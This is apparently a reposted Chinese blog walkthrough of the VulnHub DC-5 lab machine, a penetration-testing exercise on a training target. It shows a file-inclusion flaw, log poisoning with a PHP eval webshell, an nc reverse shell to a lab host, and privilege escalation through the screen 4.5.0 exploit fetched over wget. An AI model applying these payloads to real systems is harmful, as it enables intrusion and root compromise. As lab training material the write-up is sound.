当前位置: 首页 > article >正文

DC系列靶机-DC5

article 2025/1/23 13:04:03

一,环境的搭建

VM17 官网下载

kali 2023.4版 https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2023.4/

靶场文件 https://download.vulnhub.com/dc/DC-5.zip

二,步骤

首先进行主机发现;

根据MAC地址,靶机 IP为:192.168.20.147

接下来端口扫描;

发现80端口是打开的,可以尝试访问一下;

一个普通的页面;

尝试进行一个目录扫描;

存在这样一个页面;

尝试访问;

在contact.php的页面,提交之后,最底下的这个会变化;

想到之前的那个footer.php页面,想到这个thankyou.php页面可能调用了footer.php这个页面;

http://192.168.20.147/thankyou.php?file=footer.php

这里可能存在文件包含漏洞;

尝试包含访问一下/etc/passwd

http://192.168.20.147/thankyou.php?file=../../../../etc/passwd

果然访问到了passwd文件;

尝试利用这个漏洞------>文件包含

访问nignx的错误日志;

file=../../../../var/log/nginx/error.log

日志内容:

			2024/10/17 01:13:37 [error] 560#0: *54419 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou%2ephp HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147"
2024/10/17 01:15:57 [error] 559#0: *57807 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=1&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:16:06 [error] 559#0: *57807 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=2&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:16:34 [error] 559#0: *57807 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=1&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:17:53 [error] 559#0: *57817 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=1&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:32:16 [error] 559#0: *57832 FastCGI sent in stderr: "PHP message: PHP Warning:  include(file=../../../../var/log/nginx/error.log): failed to open stream: No such file or directory in /var/www/html/thankyou.php on line 44
PHP message: PHP Warning:  include(): Failed opening 'file=../../../../var/log/nginx/error.log' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/html/thankyou.php on line 44" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?file=file=../../../../var/log/nginx/error.log HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"

接下来尝试上传webshell;

http://192.168.20.147/thankyou.php?file=<?php @eval($_POST["cmd"]); ?>

尝试使用蚁剑连接;

蚁剑连接成功;

连接地址:http://192.168.20.147/thankyou.php?file=../../../../var/log/nginx/error.log
连接密码:cmd

使用kali进行监听;

nc -lnvp 4444

反弹shell,进行连接;

nc -nv 192.168.20.151 4444 -c /bin/bash

完善交互式界面;

python -c "import pty;pty.spawn('/bin/bash')"

接下来进行提权;

尝试使用suid提权;

find / -perm -4000 2>/dev/null

使用searchsploit(kali自带)搜索screen-4.5.0的历史漏洞;

searchsploit screen 4.5.0

searchsploit -m 41154

cp 41154.sh run.sh

dos2unix run.sh

使用python搭建一个简易的web服务器;

python -m http.server 5555

然后开始下载文件;

wget -c 192.168.20.151:5555/run.sh

脚本文件下载成功;

chmod 777 run.sh
./run.sh

成功拿到root权限,并且在/root目录下拿到了flag;

三,结论

文件包含漏洞的利用;

nc命令的详解;

提权首先查找是否存在可以利用的历史漏洞;

使用python搭建简易的web服务器来上传脚本;

Nginx默认日志文件的路径;


http://www.kler.cn/a/350180.html

相关文章:

  • 梯度提升决策树树(GBDT)公式推导
  • java开发,IDEA转战VSCODE配置(mac)
  • UE5 开启“Python Remote Execution“
  • STM32 FreeROTS Tickless低功耗模式
  • Swift语言的函数实现
  • Java - WebSocket
  • k8s微服务
  • Vue预渲染:深入探索prerender-spa-plugin与vue-meta-info的联合应用
  • 关于Linux下C++程序内存dump的分析和工具
  • Java项目:160 基于springboot物流管理系统(PPT+论文+说明文档)
  • C++面向对象--------继承篇
  • [Linux#65][TCP] 详解 延迟应答 | 捎带应答 | 流量控制 | 拥塞控制
  • Chromium HTML attribute与c++接口对应关系分析
  • Tomcat 配置:方便运行 Java Web 项目
  • java.io.StreamCorruptedException: invalid stream header的原因及解决方法
  • 地级市-国内旅游收入、国内旅游人数数据(2000-2023年)
  • easyocr 本地部署模型 识别图像 ocr - python 实现
  • windows下安装、配置neo4j并服务化启动
  • Ngin入门套餐
  • Rocky linux SSD安装
  • dlib库实现人脸检测
  • 使用C#获取系统关键信息:CPU、内存、硬盘、用户与网络状态
  • STM32 输入捕获模式详解:PWM 输入捕获与 PWI 模式(续篇)
  • 【C++】—通俗易懂的理解C++中的模板
  • css中 global 和 deep(两个样式穿透) 区别
  • 堡垒机——基础